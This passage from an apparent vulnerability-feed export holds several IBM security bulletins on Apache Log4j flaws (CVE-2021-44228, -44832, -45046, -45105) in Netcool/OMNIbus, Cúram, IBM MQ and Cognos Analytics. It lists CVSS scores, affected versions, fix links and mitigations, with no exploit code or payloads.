\nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nNetcool/OMNIbus| 8.1.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability by applying the fix below: \n\n**_Product_**| **_VRMF_**| **_APAR_**| _ **Remediation/Fix** \n_ \n---|---|---|--- \nOMNIbus| 8.1.0.28| IJ36852| <https://www.ibm.com/support/pages/node/6527268> \n \n## Workarounds and Mitigations\n\nIBM recommends installing Tivoli Netcool/OMNIbus 8.1.0 fix pack 8.0.1.28 or later.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n24 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHTQ\",\"label\":\"Tivoli Netcool\\/OMNIbus\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"8.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-01T11:47:35", "type": "ibm", "title": "Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-01T11:47:35", "id": "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "href": "https://www.ibm.com/support/pages/node/6552546", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:57", "description": "## Summary\n\nIBM C\u00faram Social Program Management (SPM) uses the Apache Log4j libraries for SPM logging infrastructure. There are publicly known vulnerabilities for Apache Log4j which could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nC\u00faram SPM| 8.0.0.0 - 8.0.1.0 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n_Product_| _VRMF_| _Remediation_ \n---|---|--- \nC\u00faram SPM| \n\n8.0.1.0\n\n| \n\nVisit IBM Fix Central and upgrade to [8.0.1.0_iFix2](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=8.0.1.0&platform=All&function=all> \"8.0.1.0_iFix2\" ) \n \n## Workarounds and Mitigations\n\nBased on current information, no IBM C\u00faram Social Program Management versions before V8 are impacted by the CVE-2021-44228 , CVE-2021-45046 , CVE-2021-44832 , CVE-2021-45105 vulnerabilities. 
Please refer to this [link](<https://www.ibm.com/support/pages/node/6526676> \"link\" ) for further information.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU014\",\"label\":\"Watson Health\"},\"Product\":{\"code\":\"SS8S5A\",\"label\":\"C&#250;ram Social Program Management\"},\"Component\":\"All\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF035\",\"label\":\"z\\/OS\"}],\"Version\":\"8.0.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB47\",\"label\":\"Health\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T10:51:11", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j may affect C\u00faram Social Program Management (CVE-2021-44832 , CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T10:51:11", "id": "674DDEB58033DAB9D03ED4483C0C1118FD09DBE69E73AD0AAC428EBFC61E2474", "href": "https://www.ibm.com/support/pages/node/6540904", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:17", "description": "## Summary\n\nA Denial of Service issue was identified within the Log4j fix for CVE-2021-45046 that is used by Fabric Gateway to provide logging functionality. Fabric Gateway is used by the IBM MQ blockchain bridge component of IBM MQ to provide connection capability between IBM MQ queue managers and Hyperledger Fabric. The IBM MQ Blockchain Bridge is shipped as part of IBM MQ on Linux x86-64 only, under the MQSeriesBCBridge RPM package. 
Based on current knowledge and analysis, no other IBM MQ components or installable packages are affected. This bulletin provides patch information to address the reported Log4j vulnerabilities\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: <https://exchange.xforce.ibmcloud.com/vulnerabilities/216189> for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM MQ | 9.2 CD \nIBM MQ | 9.1 CD \nIBM MQ | 9.2 LTS \n \n## Remediation/Fixes\n\nThis issue is resolved by APAR IT39467 \n\nThe following patches resolve CVE-2021-45046, CVE-2021-44228, CVE-2021-45105 & CVE-2021-44832\n\n**IBM MQ version 9.2 LTS**\n\n[Apply iFix 9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.2.0.4&platform=All&function=fixId&fixids=9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467&includeSupersedes=0&source=fc> \"Apply iFix 9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467\" )\n\n**IBM MQ version 9.1 CD and 9.2 CD**\n\n[Apply iFix 9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467 ](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.2.4&platform=All&function=fixId&fixids=9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467&includeSupersedes=0&source=fc> \"Apply iFix 9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467\" )\n\n## Workarounds and Mitigations\n\nThe IBM MQ Blockchain Bridge is shipped as part of IBM MQ on Linux x86-64 only, under the MQSeriesBCBridge RPM package. Based on current knowledge and analysis, no other IBM MQ components or installable packages are affected. 
\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYHRD\",\"label\":\"IBM MQ\"},\"Component\":\"Blockchain Bridge\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.1.0; 9.2.0\",\"Edition\":\"All\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T18:00:41", "type": "ibm", "title": "Security Bulletin: IBM MQ Blockchain bridge dependencies are vulnerable to issues in Apache Log4j (CVE-2021-45105 & CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T18:00:41", "id": "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "href": "https://www.ibm.com/support/pages/node/6538896", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:40:26", "description": "## Summary\n\nIBM Cognos Analytics is affected by security vulnerabilities. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j vulnerabilities: CVE-2021-45105 and CVE-2021-44832. IBM Cognos Analytics has upgraded Apache Log4j to v2.17.1 Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. 
By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nIf you have one of the listed affected versions, it is strongly recommended that you apply the most recent security update. \n\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. 
you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"IBM Cognos Analytics 11.2.1 Interim Fix 3 \\(Bundled\\)\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<https://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"IBM Cognos Analytics 11.0.13 Interim Fix 5 \\(Bundled\\)\" ) \n \n \nPlease note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n \nThe required remediation will be applied during the standard monthly IBM Cognos Analytics on Cloud maintenance 
window January 15, 2022\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"<log4jSafeAgent2021 Bundled>\" )\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[Security Bulletin: IBM Cognos Analytics: Apache 
Log4j vulnerability (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526474> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability \\(CVE-2021-44228\\)\" )\n\n[Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6528388> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability \\(CVE-2021-45046\\)\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n20 April 2022 Updated Fix Version links for CA 11.x Bundle Customers to point to latest Interim Fix that address Apache log4j vulnerabilities \n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTSF6\",\"label\":\"Cognos Analytics\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"11.2, 11.1, 11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:28:52", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-20T19:28:52", "id": "59E669B8BB67D676E7382F77EAD621E08DFCFBF626C52F337A77A33EF6F33748", "href": "https://www.ibm.com/support/pages/node/6538720", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:40:25", "description": "## Summary\n\nIBM Cognos Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-44228) vulnerability. Please note that this Security Bulletin has been superseded by Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832). 
See References section below.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nIf you have one of the listed affected versions, it is strongly recommended that you apply the most recent security update. \n\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. 
